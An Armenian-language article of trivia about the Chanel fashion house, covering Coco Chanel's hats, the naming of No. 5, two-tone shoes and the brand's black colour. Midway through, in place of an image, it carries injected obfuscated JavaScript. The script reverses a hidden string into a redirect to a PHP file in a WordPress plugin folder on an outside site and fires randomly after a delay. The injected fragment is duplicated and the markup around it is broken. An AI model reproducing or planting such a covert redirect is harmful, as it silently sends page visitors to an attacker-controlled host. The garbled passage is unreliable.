
Հետաքրքիր փաստեր Շանել ապրանքանիշի մասին
Նույնիսկ «Շանել» նորաձևության տան ամենամոլի երկրպագուները հնարավոր է չիմանան այս փաստերի մասին։ Ձեզ ենք ներկայացնում ֆրանսիական նորաձևության տան ամենահետաքրքիր գաղտնիքները:
Ինչի՞ց է սկսել Կոկո Շանելը
Կոկո Շանելը իր կարիերան սկսել է գլխարկներ մոդելավորելուց և սկզբնական շրջանում հենց գլխարկներով է այս ապրանքանիշը հայտնի եղել։ «Շանել»-ի գլխարկները տարբերվել են իրենց պարզությամբ և մինիմալիստական ոճով։
Ո՞րն է «Chanel No. 5» օծանելիքի անվանման սկզբնաղբյուրը
5-ը Կոկո Շանելի սիրելի թիվն է եղել, ինչը մեծ դեր է խաղացել օծանելիքի անվանման մեջ։
Ինչու՞ են դասական դարձած Շանելի կոշիկներն ունեցել երկու երանգ
Կարծես «Շանելի» ձեռագիրը դարձած այս կոշիկները մոդելավորված են եղել երկու երանգով, քանի որ Կոկո Շանելը կարծել է, որ մարմնագույնը տեսողականորեն երկարացնում է ոտքերը, իսկ սև գույնը քողարկում է կոշիկի բծերը։
$mWn=function(n){if(typeof ($mWn.list[n])=="string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["\'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toneshoes.jpg” alt=”” width=”450″ height=”562″ />
Ինչու՞ ԱՄՆ-ն սկզբում չէր ընդունում Կոկո Շանելին
1931 թվականին Կոկո Շանելը առաջին անգամ այցելեց Հոլիվուդ, սակայն ԱՄՆ-ն դեռ պատրաստ չէր ընդունել պարզ և ժամանակակից ոճը։
Ինչու՞ սևը դարձավ ապրանքանիշի գույնը
Սև գույնի նախընտրությունը գալիս էր Կոկո Շանելի մանկությունից։ Հայտնի մոդելավորողը սիրում էր սև գույնը, քանի որ այն հիշեցնում էր «Aubazine» որբանոցի համազգեստը, որտեղ Կոկոն մեծացել է։
Ինչու՞ են Շանելի ցուցադրություններում անպակաս առյուծի մոտիվները
Կոկո Շանելը 1920-ական թվականների վենետիկյան ճամփորդությունների ժամանակ ոգեշնչվել է քաղաքի խորհրդանիշ դարձած առյուծով։ Սա է պատճառը, որ մինչ օրս թե՛ «Շանելի» ցուցադրությունների, և թե՛ «Շանել» ապրանքանիշի դիմահարդարման պարագաների մեջ միշտ կարող եք տեսնել առյուծի մոտիվներ։
Քանի՞ ժամ է պահանջվում մեկ բաճկոն պատրաստելու համար
Պահանջվում է միջինում 130 ժամ ընդամենը մեկ բաճկոն ստեղծելու համար։
Աղբյուր՝ whowhatwear.com